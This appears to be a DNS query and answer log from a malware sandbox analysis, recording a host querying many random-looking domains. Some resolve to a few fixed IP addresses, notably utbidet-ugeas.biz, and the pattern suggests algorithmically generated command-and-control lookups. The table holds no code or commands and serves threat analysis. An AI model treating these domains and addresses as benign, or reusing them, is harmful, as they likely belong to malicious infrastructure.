Dec 8, 2022 20:23:31.622929096 CET	192.168.2.4	8.8.8.8	0x43d1	Standard query (0)	utbidet-ugeas.biz	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:32.177747965 CET	192.168.2.4	8.8.8.8	0x5c46	Standard query (0)	cavwousmoau.st	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:32.233095884 CET	192.168.2.4	8.8.8.8	0xc298	Standard query (0)	cavwousmoau.st	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:32.848684072 CET	192.168.2.4	8.8.8.8	0x7292	Standard query (0)	bjynqfygauaqu.tk	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:33.187784910 CET	192.168.2.4	8.8.8.8	0x6508	Standard query (0)	bjynqfygauaqu.tk	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:33.557250023 CET	192.168.2.4	8.8.8.8	0x27ce	Standard query (0)	wbhotxso.ws	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:34.126064062 CET	192.168.2.4	8.8.8.8	0x3027	Standard query (0)	utbidet-ugeas.biz	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:34.674361944 CET	192.168.2.4	8.8.8.8	0x4f56	Standard query (0)	aimgagne.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:34.794051886 CET	192.168.2.4	8.8.8.8	0x89b2	Standard query (0)	aimgagne.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:35.349617004 CET	192.168.2.4	8.8.8.8	0xd472	Standard query (0)	dcozymosctd.pw	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:35.381544113 CET	192.168.2.4	8.8.8.8	0xf2ea	Standard query (0)	dcozymosctd.pw	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:35.735510111 CET	192.168.2.4	8.8.8.8	0x1808	Standard query (0)	ujwcmmd.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:35.885071039 CET	192.168.2.4	8.8.8.8	0xf1ae	Standard query (0)	ujwcmmd.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:36.447956085 CET	192.168.2.4	8.8.8.8	0x87a9	Standard query (0)	jxqgjqq.st	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:36.520318985 CET	192.168.2.4	8.8.8.8	0xf561	Standard query (0)	jxqgjqq.st	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:36.865773916 CET	192.168.2.4	8.8.8.8	0x5954	Standard query (0)	cpidgyyodou.st	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:37.182296038 CET	192.168.2.4	8.8.8.8	0x1a6	Standard query (0)	cpidgyyodou.st	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:37.619012117 CET	192.168.2.4	8.8.8.8	0x1daf	Standard query (0)	cccyssksykq.museum	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:37.651459932 CET	192.168.2.4	8.8.8.8	0x6daf	Standard query (0)	cccyssksykq.museum	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:37.964314938 CET	192.168.2.4	8.8.8.8	0xc911	Standard query (0)	kawdmyymccbf.st	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:38.063420057 CET	192.168.2.4	8.8.8.8	0xb6f9	Standard query (0)	kawdmyymccbf.st	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:38.414344072 CET	192.168.2.4	8.8.8.8	0x1e72	Standard query (0)	jwujhuloicegg.pw	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:38.443763971 CET	192.168.2.4	8.8.8.8	0x8df0	Standard query (0)	jwujhuloicegg.pw	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:38.728600025 CET	192.168.2.4	8.8.8.8	0x4bea	Standard query (0)	eqhznmjkuzatqo.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:38.849514961 CET	192.168.2.4	8.8.8.8	0x4e05	Standard query (0)	eqhznmjkuzatqo.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:39.273173094 CET	192.168.2.4	8.8.8.8	0x202b	Standard query (0)	lqsgfhgcg.ws	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:39.621973991 CET	192.168.2.4	8.8.8.8	0x534a	Standard query (0)	utbidet-ugeas.biz	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:40.154052973 CET	192.168.2.4	8.8.8.8	0x1d7e	Standard query (0)	ordfyctqfzrtv.nu	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:40.189347982 CET	192.168.2.4	8.8.8.8	0xab95	Standard query (0)	ordfyctqfzrtv.nu	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:40.651340008 CET	192.168.2.4	8.8.8.8	0x28d3	Standard query (0)	ssgqwyuy.ws	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:41.060657024 CET	192.168.2.4	8.8.8.8	0x280f	Standard query (0)	utbidet-ugeas.biz	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:41.432226896 CET	192.168.2.4	8.8.8.8	0x37f9	Standard query (0)	axugskgmxksem.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:41.837625027 CET	192.168.2.4	8.8.8.8	0x893d	Standard query (0)	axugskgmxksem.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:42.799499035 CET	192.168.2.4	8.8.8.8	0xc68f	Standard query (0)	tdxqi.nu	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:42.842886925 CET	192.168.2.4	8.8.8.8	0xd5ed	Standard query (0)	tdxqi.nu	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:46.748244047 CET	192.168.2.4	8.8.8.8	0xc0af	Standard query (0)	ucingmv.st	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:46.805377007 CET	192.168.2.4	8.8.8.8	0x47f6	Standard query (0)	ucingmv.st	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:47.087938070 CET	192.168.2.4	8.8.8.8	0x8fd6	Standard query (0)	asxgzel.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:48.123161077 CET	192.168.2.4	8.8.8.8	0x8fd6	Standard query (0)	asxgzel.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:48.435883045 CET	192.168.2.4	8.8.8.8	0xdf08	Standard query (0)	asxgzel.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:48.771157026 CET	192.168.2.4	8.8.8.8	0x50dc	Standard query (0)	lgipm.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:49.085066080 CET	192.168.2.4	8.8.8.8	0x4d04	Standard query (0)	lgipm.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:49.400223970 CET	192.168.2.4	8.8.8.8	0x9656	Standard query (0)	tstwnth.museum	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:49.432039976 CET	192.168.2.4	8.8.8.8	0xad4f	Standard query (0)	tstwnth.museum	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:49.736393929 CET	192.168.2.4	8.8.8.8	0x9439	Standard query (0)	qvewy.nu	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:49.775654078 CET	192.168.2.4	8.8.8.8	0x8f6c	Standard query (0)	qvewy.nu	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:50.128149986 CET	192.168.2.4	8.8.8.8	0xa35f	Standard query (0)	nonemtugazb.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:50.246372938 CET	192.168.2.4	8.8.8.8	0x3fbe	Standard query (0)	nonemtugazb.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:50.630568027 CET	192.168.2.4	8.8.8.8	0x6133	Standard query (0)	mevqfyci.pw	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:50.665041924 CET	192.168.2.4	8.8.8.8	0x40fd	Standard query (0)	mevqfyci.pw	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:51.085227966 CET	192.168.2.4	8.8.8.8	0x38e2	Standard query (0)	iugrwzgnmcsehh.nu	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:51.133073092 CET	192.168.2.4	8.8.8.8	0x3efc	Standard query (0)	iugrwzgnmcsehh.nu	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:51.416974068 CET	192.168.2.4	8.8.8.8	0x6d12	Standard query (0)	swsiysmmkqigg.ws	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:51.764244080 CET	192.168.2.4	8.8.8.8	0xed38	Standard query (0)	utbidet-ugeas.biz	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:52.168674946 CET	192.168.2.4	8.8.8.8	0x194a	Standard query (0)	okszm.nu	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:52.224914074 CET	192.168.2.4	8.8.8.8	0x8021	Standard query (0)	okszm.nu	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:52.534522057 CET	192.168.2.4	8.8.8.8	0x7f2b	Standard query (0)	qepmedm.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:52.658142090 CET	192.168.2.4	8.8.8.8	0x9eea	Standard query (0)	qepmedm.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:52.939717054 CET	192.168.2.4	8.8.8.8	0xa7b0	Standard query (0)	csqrqoawfme.tk	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:53.274454117 CET	192.168.2.4	8.8.8.8	0x604c	Standard query (0)	csqrqoawfme.tk	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:53.932790041 CET	192.168.2.4	8.8.8.8	0xae78	Standard query (0)	yyirivnncliy.ws	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:54.343518019 CET	192.168.2.4	8.8.8.8	0xed0e	Standard query (0)	utbidet-ugeas.biz	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:54.840564013 CET	192.168.2.4	8.8.8.8	0xc928	Standard query (0)	ehuausdiet.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:55.168575048 CET	192.168.2.4	8.8.8.8	0xb507	Standard query (0)	ehuausdiet.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:55.554075956 CET	192.168.2.4	8.8.8.8	0x62b	Standard query (0)	demyp.nu	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:55.661281109 CET	192.168.2.4	8.8.8.8	0xcf8a	Standard query (0)	demyp.nu	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:55.973915100 CET	192.168.2.4	8.8.8.8	0x1743	Standard query (0)	wtrjyeues.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:56.150597095 CET	192.168.2.4	8.8.8.8	0xb383	Standard query (0)	wtrjyeues.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:56.462142944 CET	192.168.2.4	8.8.8.8	0xec9e	Standard query (0)	uiymgps.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:56.585864067 CET	192.168.2.4	8.8.8.8	0x7afb	Standard query (0)	uiymgps.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:57.215100050 CET	192.168.2.4	8.8.8.8	0x1fb7	Standard query (0)	icbmkx.st	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:57.320890903 CET	192.168.2.4	8.8.8.8	0x775d	Standard query (0)	icbmkx.st	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:58.365293980 CET	192.168.2.4	8.8.8.8	0x6d7f	Standard query (0)	gbtrsh.st	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:58.590827942 CET	192.168.2.4	8.8.8.8	0xd634	Standard query (0)	gbtrsh.st	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:59.314714909 CET	192.168.2.4	8.8.8.8	0x74e4	Standard query (0)	jyaxasrewrsmmu.st	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:59.629080057 CET	192.168.2.4	8.8.8.8	0xaec8	Standard query (0)	jyaxasrewrsmmu.st	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:24:00.068711042 CET	192.168.2.4	8.8.8.8	0x4c3	Standard query (0)	lpzegvpcu.nu	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:24:00.100835085 CET	192.168.2.4	8.8.8.8	0x4aca	Standard query (0)	lpzegvpcu.nu	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:24:00.419121027 CET	192.168.2.4	8.8.8.8	0x257b	Standard query (0)	mloaky.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:24:00.640671968 CET	192.168.2.4	8.8.8.8	0x5f07	Standard query (0)	mloaky.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:24:01.204525948 CET	192.168.2.4	8.8.8.8	0x544	Standard query (0)	mybuerovaln.pw	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:24:01.234435081 CET	192.168.2.4	8.8.8.8	0x52e	Standard query (0)	mybuerovaln.pw	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:24:01.583573103 CET	192.168.2.4	8.8.8.8	0xf07e	Standard query (0)	ssgykumyk.st	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:24:01.643162012 CET	192.168.2.4	8.8.8.8	0x914d	Standard query (0)	ssgykumyk.st	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:24:02.216643095 CET	192.168.2.4	8.8.8.8	0x9325	Standard query (0)	gceqmqu.vg	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:24:02.766757011 CET	192.168.2.4	8.8.8.8	0xf666	Standard query (0)	utbidet-ugeas.biz	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:24:07.392894030 CET	192.168.2.4	8.8.8.8	0xcfb2	Standard query (0)	trqmaudkiuqe.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:24:07.513411045 CET	192.168.2.4	8.8.8.8	0x49ed	Standard query (0)	trqmaudkiuqe.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:24:07.694883108 CET	192.168.2.4	8.8.8.8	0x3881	Standard query (0)	wecfevuygxew.vg	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:24:07.830710888 CET	192.168.2.4	8.8.8.8	0x3872	Standard query (0)	utbidet-ugeas.biz	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:24:08.175497055 CET	192.168.2.4	8.8.8.8	0x73c	Standard query (0)	iapwekmek.tk	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:24:08.518284082 CET	192.168.2.4	8.8.8.8	0x4c94	Standard query (0)	iapwekmek.tk	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:24:09.130022049 CET	192.168.2.4	8.8.8.8	0x2e92	Standard query (0)	iesgztkg.nu	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:24:09.232989073 CET	192.168.2.4	8.8.8.8	0x697f	Standard query (0)	iesgztkg.nu	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:24:09.379422903 CET	192.168.2.4	8.8.8.8	0x99dd	Standard query (0)	qlyiuhnqg.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:24:09.497951984 CET	192.168.2.4	8.8.8.8	0x7f7e	Standard query (0)	qlyiuhnqg.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:24:09.767004967 CET	192.168.2.4	8.8.8.8	0x3b06	Standard query (0)	lseeihdfamlcr.nu	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:24:09.797178984 CET	192.168.2.4	8.8.8.8	0xc16d	Standard query (0)	lseeihdfamlcr.nu	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:24:10.007364035 CET	192.168.2.4	8.8.8.8	0x49fa	Standard query (0)	kgwowukxuapio.nu	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:24:10.052675962 CET	192.168.2.4	8.8.8.8	0x1750	Standard query (0)	kgwowukxuapio.nu	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:24:10.468362093 CET	192.168.2.4	8.8.8.8	0x17b0	Standard query (0)	mwnkma.vg	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:24:10.575306892 CET	192.168.2.4	8.8.8.8	0x3f85	Standard query (0)	utbidet-ugeas.biz	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:24:10.904802084 CET	192.168.2.4	8.8.8.8	0x3a4c	Standard query (0)	gevwpaqsgqr.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:24:11.022917986 CET	192.168.2.4	8.8.8.8	0x3604	Standard query (0)	gevwpaqsgqr.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:24:11.303931952 CET	192.168.2.4	8.8.8.8	0x2f8e	Standard query (0)	gcwweypsyass.mp	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:24:11.424994946 CET	192.168.2.4	8.8.8.8	0x4ad3	Standard query (0)	gcwweypsyass.mp	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 8, 2022 20:22:39.920676947 CET	8.8.8.8	192.168.2.4	0xb1d1	Name error (3)	curipbeqyczvl.st	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:40.120923042 CET	8.8.8.8	192.168.2.4	0xd64f	Name error (3)	curipbeqyczvl.st	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:40.343619108 CET	8.8.8.8	192.168.2.4	0x690e	No error (0)	gqwrm.vg		88.198.29.97	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:40.498470068 CET	8.8.8.8	192.168.2.4	0xcb08	No error (0)	utbidet-ugeas.biz		167.99.35.88	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:40.601792097 CET	8.8.8.8	192.168.2.4	0x63e9	No error (0)	utbidet-ugeas.biz		167.99.35.88	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:53.009057999 CET	8.8.8.8	192.168.2.4	0x4606	Name error (3)	mcydsewd.mp	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:53.130599022 CET	8.8.8.8	192.168.2.4	0x6df9	Name error (3)	mcydsewd.mp	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:53.373845100 CET	8.8.8.8	192.168.2.4	0x3b4c	Name error (3)	sgwkqaq.museum	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:53.409143925 CET	8.8.8.8	192.168.2.4	0x68d3	Name error (3)	sgwkqaq.museum	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:53.653202057 CET	8.8.8.8	192.168.2.4	0x1e5f	Name error (3)	owagspnakos.nu	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:53.694746971 CET	8.8.8.8	192.168.2.4	0x713	Name error (3)	owagspnakos.nu	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:53.915304899 CET	8.8.8.8	192.168.2.4	0x8089	Name error (3)	qvesoxmeyeyo.museum	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:54.017757893 CET	8.8.8.8	192.168.2.4	0x49e1	Name error (3)	qvesoxmeyeyo.museum	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:54.272373915 CET	8.8.8.8	192.168.2.4	0x3562	Name error (3)	uvmmavmiuow.st	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:54.312222004 CET	8.8.8.8	192.168.2.4	0x298b	Name error (3)	uvmmavmiuow.st	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:54.600961924 CET	8.8.8.8	192.168.2.4	0x8c2e	Name error (3)	wlzqvavpfi.mp	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:55.727726936 CET	8.8.8.8	192.168.2.4	0x1ef2	Name error (3)	wlzqvavpfi.mp	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:56.073496103 CET	8.8.8.8	192.168.2.4	0xc4d1	Name error (3)	ymjmccm.mp	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:56.192514896 CET	8.8.8.8	192.168.2.4	0x8bd4	Name error (3)	ymjmccm.mp	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:56.425513983 CET	8.8.8.8	192.168.2.4	0xd37	Name error (3)	eaytemokm.nu	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:56.487956047 CET	8.8.8.8	192.168.2.4	0xb61d	Name error (3)	eaytemokm.nu	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:56.721770048 CET	8.8.8.8	192.168.2.4	0x1ef2	Name error (3)	wlzqvavpfi.mp	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:56.843210936 CET	8.8.8.8	192.168.2.4	0xf890	Name error (3)	kuyekiyyn.mp	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:56.967293024 CET	8.8.8.8	192.168.2.4	0xd178	Name error (3)	kuyekiyyn.mp	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:57.246923923 CET	8.8.8.8	192.168.2.4	0x33a7	Name error (3)	zrgoiae.st	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:57.402385950 CET	8.8.8.8	192.168.2.4	0x41ee	Name error (3)	zrgoiae.st	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:57.638731956 CET	8.8.8.8	192.168.2.4	0x5a78	No error (0)	wksmneieulciyq.vg		88.198.29.97	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:57.860694885 CET	8.8.8.8	192.168.2.4	0xc0dd	No error (0)	utbidet-ugeas.biz		167.99.35.88	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:58.254129887 CET	8.8.8.8	192.168.2.4	0x145c	No error (0)	sesqboeqkyqyg.ws		64.70.19.203	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:58.587177038 CET	8.8.8.8	192.168.2.4	0x4c	No error (0)	utbidet-ugeas.biz		167.99.35.88	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:58.999572992 CET	8.8.8.8	192.168.2.4	0x444a	Name error (3)	ywbwv.st	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:59.062969923 CET	8.8.8.8	192.168.2.4	0xe85a	Name error (3)	ywbwv.st	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:59.313986063 CET	8.8.8.8	192.168.2.4	0x806d	No error (0)	gececkkbsocii.vg		88.198.29.97	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:59.486464977 CET	8.8.8.8	192.168.2.4	0x7e44	No error (0)	utbidet-ugeas.biz		167.99.35.88	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:22:59.917392969 CET	8.8.8.8	192.168.2.4	0xdf10	No error (0)	eoidzfagia.ws		64.70.19.203	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:00.258950949 CET	8.8.8.8	192.168.2.4	0x61fb	No error (0)	utbidet-ugeas.biz		167.99.35.88	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:00.682022095 CET	8.8.8.8	192.168.2.4	0x52e2	No error (0)	wgcoeoyemo.ws		64.70.19.203	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:00.953919888 CET	8.8.8.8	192.168.2.4	0x5062	No error (0)	utbidet-ugeas.biz		167.99.35.88	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:01.728379011 CET	8.8.8.8	192.168.2.4	0xba0d	Name error (3)	ubkukyoqxnyx.tk	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:02.373030901 CET	8.8.8.8	192.168.2.4	0xf52f	Name error (3)	ubkukyoqxnyx.tk	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:02.860977888 CET	8.8.8.8	192.168.2.4	0x8261	No error (0)	skffvor.vg		88.198.29.97	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:04.957492113 CET	8.8.8.8	192.168.2.4	0x67b0	No error (0)	utbidet-ugeas.biz		167.99.35.88	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:06.439908028 CET	8.8.8.8	192.168.2.4	0x75c	Name error (3)	uyriu.st	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:06.632731915 CET	8.8.8.8	192.168.2.4	0x74ca	Name error (3)	uyriu.st	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:06.841532946 CET	8.8.8.8	192.168.2.4	0x34ca	No error (0)	oeifsye.vg		88.198.29.97	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:06.904901028 CET	8.8.8.8	192.168.2.4	0xaa0a	No error (0)	utbidet-ugeas.biz		167.99.35.88	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:07.414788961 CET	8.8.8.8	192.168.2.4	0x27ee	Name error (3)	sxqom.mp	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:07.532382011 CET	8.8.8.8	192.168.2.4	0xba96	Name error (3)	sxqom.mp	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:07.753132105 CET	8.8.8.8	192.168.2.4	0x9f45	Name error (3)	tigrmsgpa.nu	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:07.784653902 CET	8.8.8.8	192.168.2.4	0xc304	Name error (3)	tigrmsgpa.nu	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:08.073632956 CET	8.8.8.8	192.168.2.4	0x8106	Name error (3)	kjyueawyersmum.museum	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:08.112761974 CET	8.8.8.8	192.168.2.4	0x63d5	Name error (3)	kjyueawyersmum.museum	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:08.551196098 CET	8.8.8.8	192.168.2.4	0x118	Name error (3)	stqluc.mp	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:08.667366982 CET	8.8.8.8	192.168.2.4	0x5d7d	Name error (3)	stqluc.mp	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:09.936551094 CET	8.8.8.8	192.168.2.4	0x7abe	No error (0)	hcfigcsf.ws		64.70.19.203	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:09.941215038 CET	8.8.8.8	192.168.2.4	0x7abe	No error (0)	hcfigcsf.ws		64.70.19.203	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:10.175755978 CET	8.8.8.8	192.168.2.4	0x2060	No error (0)	utbidet-ugeas.biz		167.99.35.88	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:10.653247118 CET	8.8.8.8	192.168.2.4	0x783e	Name error (3)	wghscmmbcokww.mp	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:10.775585890 CET	8.8.8.8	192.168.2.4	0x1cd	Name error (3)	wghscmmbcokww.mp	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:11.168416023 CET	8.8.8.8	192.168.2.4	0xe4ae	Name error (3)	oktdaeqs.mp	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:11.479242086 CET	8.8.8.8	192.168.2.4	0xdcfa	Name error (3)	oktdaeqs.mp	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:12.035119057 CET	8.8.8.8	192.168.2.4	0xb0f3	Name error (3)	kuegscoauwnco.museum	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:12.105747938 CET	8.8.8.8	192.168.2.4	0x55f6	Name error (3)	kuegscoauwnco.museum	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:12.402070999 CET	8.8.8.8	192.168.2.4	0x1b80	No error (0)	ovoykqlc.vg		88.198.29.97	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:12.616820097 CET	8.8.8.8	192.168.2.4	0xae35	No error (0)	utbidet-ugeas.biz		167.99.35.88	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:13.072608948 CET	8.8.8.8	192.168.2.4	0xda88	Name error (3)	qivzpbqveslmvh.nu	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:13.109101057 CET	8.8.8.8	192.168.2.4	0x795c	Name error (3)	qivzpbqveslmvh.nu	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:13.399511099 CET	8.8.8.8	192.168.2.4	0xab0	Name error (3)	efmgwmd.st	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:13.492943048 CET	8.8.8.8	192.168.2.4	0x818b	Name error (3)	efmgwmd.st	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:13.751251936 CET	8.8.8.8	192.168.2.4	0x51e3	Name error (3)	suerncbuckd.nu	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:13.813426018 CET	8.8.8.8	192.168.2.4	0x261e	Name error (3)	suerncbuckd.nu	none	none	A (IP address)	IN (0x0001)	false
Dec 8, 2022 20:23:14.137958050 CET	8.8.8.8	192.168.2.4	0xe481	Name error (3)	xwqkugqjrwceo.mp	none	none	A (IP address)	IN (0x0001)	false
